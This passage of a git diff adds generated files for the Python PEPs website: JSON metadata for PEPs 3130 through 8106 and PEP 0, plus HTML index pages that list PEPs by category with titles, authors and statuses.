Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2007", + "python_version": "3.0", + "post_history": "22-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3130/" + }, + "3131": { + "number": 3131, + "title": "Supporting Non-ASCII Identifiers", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3131/" + }, + "3132": { + "number": 3132, + "title": "Extended Iterable Unpacking", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3132/" + }, + "3133": { + "number": 3133, + "title": "Introducing Roles", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "13-May-2007", + "resolution": null, + "requires": "3115, 3129", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3133/" + }, + "3134": { + "number": 3134, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3134/" + }, + "3135": { + "number": 3135, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney, Lie Ryan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "3.0", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__, `12-Mar-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3135/" + }, + "3136": { + "number": 3136, + "title": "Labeled break and continue", + "authors": "Matt Chisholm", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Jun-2007", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3136/" + }, + "3137": { + "number": 3137, + "title": "Immutable Bytes and Mutable Buffer", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2007", + "python_version": "3.0", + "post_history": "26-Sep-2007, 30-Sep-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3137/" + }, + "3138": { + "number": 3138, + "title": "String representation in Python 3000", + "authors": "Atsuo Ishimoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": 
"", + "created": "05-May-2008", + "python_version": "3.0", + "post_history": "05-May-2008, 05-Jun-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3138/" + }, + "3139": { + "number": 3139, + "title": "Cleaning out sys and the \"interpreter\" module", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2008", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3139/" + }, + "3140": { + "number": 3140, + "title": "str(container) should call str(item), not repr(item)", + "authors": "Oleg Broytman, Jim J. Jewett", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-May-2008", + "python_version": null, + "post_history": "28-May-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3140/" + }, + "3141": { + "number": 3141, + "title": "A Type Hierarchy for Numbers", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Apr-2007", + "python_version": "3.0", + "post_history": "25-Apr-2007, 16-May-2007, 02-Aug-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3141/" + }, + "3142": { + "number": 3142, + "title": "Add a \"while\" clause to generator expressions", + "authors": "Gerald Britton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Jan-2009", + "python_version": "3.0", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126136.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3142/" + }, + "3143": { + "number": 3143, + "title": "Standard daemon process library", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2009", + "python_version": "3.x", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3143/" + }, + "3144": { + "number": 3144, + "title": "IP Address Manipulation Library for the Python Standard Library", + "authors": "Peter Moody", + "discussions_to": "ipaddr-py-dev@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119474.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3144/" + }, + "3145": { + "number": 3145, + "title": "Asynchronous I/O For subprocess.Popen", + "authors": "Eric Pruitt, Charles R. 
McCreary, Josiah Carlson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Aug-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3145/" + }, + "3146": { + "number": 3146, + "title": "Merging Unladen Swallow into CPython", + "authors": "Collin Winter, Jeffrey Yasskin, Reid Kleckner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3146/" + }, + "3147": { + "number": 3147, + "title": "PYC Repository Directories", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Dec-2009", + "python_version": "3.2", + "post_history": "30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-April/099414.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3147/" + }, + "3148": { + "number": 3148, + "title": "futures - execute computations asynchronously", + "authors": "Brian Quinlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3148/" + }, + "3149": { + "number": 3149, + "title": "ABI version tagged .so files", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.2", + "post_history": "14-Jul-2010, 22-Jul-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-September/103408.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3149/" + }, + "3150": { + "number": 3150, + "title": "Statement local namespaces (aka \"given\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.4", + "post_history": "14-Jul-2010, 21-Apr-2011, 13-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3150/" + }, + "3151": { + "number": 3151, + "title": "Reworking the OS and IO exception hierarchy", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2010", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-October/114033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3151/" + }, + "3152": { + "number": 3152, + "title": "Cofunctions", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + 
"url": "https://peps.python.org/pep-3152/" + }, + "3153": { + "number": 3153, + "title": "Asynchronous IO support", + "authors": "Laurens Van Houtven", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "29-May-2011", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3156", + "url": "https://peps.python.org/pep-3153/" + }, + "3154": { + "number": 3154, + "title": "Pickle protocol version 4", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2011", + "python_version": "3.4", + "post_history": "`12-Aug-2011 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130439.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3154/" + }, + "3155": { + "number": 3155, + "title": "Qualified name for classes and functions", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Oct-2011", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-November/114545.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3155/" + }, + "3156": { + "number": 3156, + "title": "Asynchronous IO Support Rebooted: the \"asyncio\" Module", + "authors": "Guido van Rossum", + "discussions_to": "python-tulip@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2012", + "python_version": "3.3", + "post_history": "21-Dec-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130419.html", + "requires": null, + "replaces": "3153", + "superseded_by": null, + "url": "https://peps.python.org/pep-3156/" + }, + "3333": { + "number": 3333, + "title": "Python Web Server Gateway Interface v1.0.1", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "26-Sep-2010", + "python_version": null, + "post_history": "26-Sep-2010, 04-Oct-2010", + "resolution": null, + "requires": null, + "replaces": "333", + "superseded_by": null, + "url": "https://peps.python.org/pep-3333/" + }, + "8000": { + "number": 8000, + "title": "Python Language Governance Proposal Overview", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8000/" + }, + "8001": { + "number": 8001, + "title": "Python Governance Voting Process", + "authors": "Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, \u0141ukasz Langa, Mariatta, Nathaniel J. 
Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8001/" + }, + "8002": { + "number": 8002, + "title": "Open Source Governance Survey", + "authors": "Barry Warsaw, \u0141ukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8002/" + }, + "8010": { + "number": 8010, + "title": "The Technical Leader Governance Model", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8010/" + }, + "8011": { + "number": 8011, + "title": "Python Governance Model Lead by Trio of Pythonistas", + "authors": "Mariatta, Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8011/" + }, + "8012": { + "number": 8012, + "title": "The Community Governance Model", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "03-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8012/" + }, + "8013": { + "number": 8013, + "title": "The External Council Governance Model", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "14-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8013/" + }, + "8014": { + "number": 8014, + "title": "The Commons Governance Model", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "16-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8014/" + }, + "8015": { + "number": 8015, + "title": "Organization of the Python community", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8015/" + }, + "8016": { + "number": 8016, + "title": "The Steering Council Model", + "authors": "Nathaniel J. 
Smith, Donald Stufft", + "discussions_to": null, + "status": "Accepted", + "type": "Informational", + "topic": "governance", + "created": "01-Nov-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8016/" + }, + "8100": { + "number": 8100, + "title": "January 2019 Steering Council election", + "authors": "Nathaniel J. Smith, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "03-Jan-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8100/" + }, + "8101": { + "number": 8101, + "title": "2020 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "16-Nov-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8101/" + }, + "8102": { + "number": 8102, + "title": "2021 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "29-Oct-2020", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8102/" + }, + "8103": { + "number": 8103, + "title": "2022 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2021", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8103/" + }, + "8104": { + "number": 8104, + "title": "2023 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "08-Nov-2022", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8104/" + }, + "8105": { + "number": 8105, + "title": "2024 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "23-Oct-2023", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8105/" + }, + "8106": { + "number": 8106, + "title": "2025 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "21-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8106/" + }, + "0": { + "number": 0, + "title": "Index of Python Enhancement Proposals (PEPs)", + "authors": "The PEP Editors", + "discussions_to": null, + "status": "Active", + "type": 
"Informational", + "topic": "", + "created": "13-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0000/" + } +} \ No newline at end of file diff --git a/contents/index.html b/contents/index.html new file mode 100644 index 00000000000..14d843378e6 --- /dev/null +++ b/contents/index.html @@ -0,0 +1,104 @@ + + + + + + + + Python Enhancement Proposals (PEPs) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Python Enhancement Proposals (PEPs)

+

This is an internal Sphinx page; please go to the PEP Index.

+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/index.html b/index.html new file mode 100644 index 00000000000..64fad71e205 --- /dev/null +++ b/index.html @@ -0,0 +1,5375 @@ + + + + + + + + PEP 0 – Index of Python Enhancement Proposals (PEPs) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 0 – Index of Python Enhancement Proposals (PEPs)

+
+
Author:
+
The PEP Editors
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
13-Jul-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP contains the index of all Python Enhancement Proposals, +known as PEPs. PEP numbers are assigned +by the PEP editors, and once assigned are never changed. The +version control history of +the PEP texts represents their historical record.

+
+
+

Topics

+

PEPs for specialist subjects are indexed by topic.

+ +
+
+

API

+

The PEPs API is a JSON file of metadata about all the published PEPs. Read more here.

+
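As a minimal sketch of consuming this API (assuming the JSON index is published at https://peps.python.org/api/peps.json, the path documented on the API page referenced above), the snippet below fetches the file using only the standard library and filters it by the metadata fields visible in the JSON earlier in this diff:

import json
from urllib.request import urlopen

# Assumed endpoint for the machine-readable PEP index described above.
PEPS_API = "https://peps.python.org/api/peps.json"

with urlopen(PEPS_API) as response:
    peps = json.load(response)  # maps PEP numbers (as strings) to metadata dicts

# Each entry carries the fields shown in the JSON earlier in this diff:
# "number", "title", "authors", "status", "type", "topic", "created",
# "python_version", "url", and so on.
final_governance = [
    pep for pep in peps.values()
    if pep["topic"] == "governance" and pep["status"] == "Final"
]
for pep in sorted(final_governance, key=lambda p: p["number"]):
    print(f"PEP {pep['number']}: {pep['title']} ({pep['url']})")

The mapping's values follow the same key/value layout shown in the JSON file above, so no third-party packages are needed to work with the index.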
+
+

Numerical Index

+

The numerical index contains a table of all PEPs, ordered by number.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
(In the PEP column, the first letter encodes the proposal type and the second its status; for example, PA is a Process PEP that is Active, and SF further below is a Standards Track PEP that is Final.)
PEP | Title | Authors | Python-Version
PA 1 | PEP Purpose and Guidelines | Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA 2 | Procedure for Adding New Modules | Brett Cannon, Martijn Faassen
PA 4 | Deprecation of Standard Modules | Brett Cannon, Martin von Löwis
PA 7 | Style Guide for C Code | Guido van Rossum, Barry Warsaw
PA 8 | Style Guide for Python Code | Guido van Rossum, Barry Warsaw, Alyssa Coghlan
PA 10 | Voting Guidelines | Barry Warsaw
PA 11 | CPython platform support | Martin von Löwis, Brett Cannon
PA 12 | Sample reStructuredText PEP Template | David Goodger, Barry Warsaw, Brett Cannon
PA 13 | Python Language Governance | The Python core team and community
PA 387 | Backwards Compatibility Policy | Benjamin Peterson
PA 545 | Python Documentation Translations | Julien Palard, Inada Naoki, Victor Stinner
PA 602 | Annual Release Cycle for Python | Łukasz Langa | 3.9
PA 609 | Python Packaging Authority (PyPA) Governance | Dustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA 676 | PEP Infrastructure Process | Adam Turner
PA 729 | Typing governance process | Jelle Zijlstra, Shantanu Jain
PA 731 | C API Working Group Charter | Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA 732 | The Python Documentation Editorial Board | Joanna Jablonski
PA 761 | Deprecating PGP signatures for CPython artifacts | Seth Michael Larson | 3.14
+
+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
IA 20 | The Zen of Python | Tim Peters
IA 101 | Doing Python Releases 101 | Barry Warsaw, Guido van Rossum
IF 247 | API for Cryptographic Hash Functions | A.M. Kuchling
IF 248 | Python Database API Specification v1.0 | Greg Stein, Marc-André Lemburg
IF 249 | Python Database API Specification v2.0 | Marc-André Lemburg
IA 257 | Docstring Conventions | David Goodger, Guido van Rossum
IF 272 | API for Block Encryption Algorithms v1.0 | A.M. Kuchling
IA 287 | reStructuredText Docstring Format | David Goodger
IA 290 | Code Migration and Modernization | Raymond Hettinger
IF 333 | Python Web Server Gateway Interface v1.0 | Phillip J. Eby
IA 394 | The “python” Command on Unix-Like Systems | Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
IF 399 | Pure Python/C Accelerator Module Compatibility Requirements | Brett Cannon | 3.3
IF 430 | Migrating to Python 3 as the default online documentation | Alyssa Coghlan
IA 434 | IDLE Enhancement Exception for All Branches | Todd Rovito, Terry Reedy
IF 452 | API for Cryptographic Hash Functions v2.0 | A.M. Kuchling, Christian Heimes
IF 457 | Notation For Positional-Only Parameters | Larry Hastings
IF 482 | Literature Overview for Type Hints | Łukasz Langa
IF 483 | The Theory of Type Hints | Guido van Rossum, Ivan Levkivskyi
IA 514 | Python registration in the Windows registry | Steve Dower
IF 579 | Refactoring C functions and methods | Jeroen Demeyer
IF 588 | GitHub Issues Migration Plan | Mariatta
IA 596 | Python 3.9 Release Schedule | Łukasz Langa | 3.9
IF 607 | Reducing CPython’s Feature Delivery Latency | Łukasz Langa, Steve Dower, Alyssa Coghlan | 3.9
IA 619 | Python 3.10 Release Schedule | Pablo Galindo Salgado | 3.10
IF 630 | Isolating Extension Modules | Petr Viktorin
IF 635 | Structural Pattern Matching: Motivation and Rationale | Tobias Kohn, Guido van Rossum | 3.10
IF 636 | Structural Pattern Matching: Tutorial | Daniel F Moisset | 3.10
IF 659 | Specializing Adaptive Interpreter | Mark Shannon
IA 664 | Python 3.11 Release Schedule | Pablo Galindo Salgado | 3.11
IA 672 | Unicode-related Security Considerations for Python | Petr Viktorin
IA 693 | Python 3.12 Release Schedule | Thomas Wouters | 3.12
IA 719 | Python 3.13 Release Schedule | Thomas Wouters | 3.13
IF 733 | An Evaluation of Python’s Public C API | Erlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
IA 745 | Python 3.14 Release Schedule | Hugo van Kemenade | 3.14
IF 762 | REPL-acing the default REPL | Pablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel | 3.13
IA 801 | Reserved | Barry Warsaw
IF 3333 | Python Web Server Gateway Interface v1.0.1 | Phillip J. Eby
IF 8000 | Python Language Governance Proposal Overview | Barry Warsaw
IF 8002 | Open Source Governance Survey | Barry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA 8016 | The Steering Council Model | Nathaniel J. Smith, Donald Stufft
IF 8100 | January 2019 Steering Council election | Nathaniel J. Smith, Ee Durbin
IF 8101 | 2020 Term Steering Council election | Ewa Jodlowska, Ee Durbin
IF 8102 | 2021 Term Steering Council election | Ewa Jodlowska, Ee Durbin, Joe Carey
IF 8103 | 2022 Term Steering Council election | Ewa Jodlowska, Ee Durbin, Joe Carey
IF 8104 | 2023 Term Steering Council election | Ee Durbin
IF 8105 | 2024 Term Steering Council election | Ee Durbin
IF 8106 | 2025 Term Steering Council election | Ee Durbin
+
+
+

Provisional PEPs (provisionally accepted; interface may still change)

+ + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
SP 639 | Improving License Clarity with Better Package Metadata | Philippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP 708 | Extending the Repository API to Mitigate Dependency Confusion Attacks | Donald Stufft
+
+
+

Accepted PEPs (accepted; may not be implemented yet)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
SA 458 | Secure PyPI downloads with signed repository metadata | Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA 563 | Postponed Evaluation of Annotations | Łukasz Langa | 3.7
SA 590 | Vectorcall: a fast calling protocol for CPython | Mark Shannon, Jeroen Demeyer | 3.8
SA 625 | Filename of a Source Distribution | Tzu-ping Chung, Paul Moore
SA 649 | Deferred Evaluation Of Annotations Using Descriptors | Larry Hastings | 3.14
SA 658 | Serve Distribution Metadata in the Simple Repository API | Tzu-ping Chung
SA 668 | Marking Python base environments as “externally managed” | Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA 685 | Comparison of extra names for optional distribution dependencies | Brett Cannon
SA 686 | Make UTF-8 mode default | Inada Naoki | 3.15
SA 687 | Isolating modules in the standard library | Erlend Egeberg Aasland, Petr Viktorin | 3.12
SA 691 | JSON-based Simple API for Python Package Indexes | Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA 699 | Remove private dict version field added in PEP 509 | Ken Jin | 3.12
SA 701 | Syntactic formalization of f-strings | Pablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías | 3.12
SA 703 | Making the Global Interpreter Lock Optional in CPython | Sam Gross | 3.13
SA 714 | Rename dist-info-metadata in the Simple API | Donald Stufft
SA 735 | Dependency Groups in pyproject.toml | Stephen Rosen
SA 753 | Uniform project URLs in core metadata | William Woodruff, Facundo Tuesca
+
+
+

Open PEPs (under consideration)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
S 467 | Minor API improvements for binary sequences | Alyssa Coghlan, Ethan Furman | 3.13
S 480 | Surviving a Compromise of PyPI: End-to-end signing of packages | Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S 603 | Adding a frozenmap type to collections | Yury Selivanov
S 638 | Syntactic Macros | Mark Shannon
S 653 | Precise Semantics for Pattern Matching | Mark Shannon
S 661 | Sentinel Values | Tal Einat
S 671 | Syntax for late-bound function argument defaults | Chris Angelico | 3.12
S 679 | Allow parentheses in assert statements | Pablo Galindo Salgado | 3.12
S 694 | Upload 2.0 API for Python Package Repositories | Donald Stufft
S 710 | Recording the provenance of installed packages | Fridolín Pokorný
S 711 | PyBI: a standard format for distributing Python Binaries | Nathaniel J. Smith
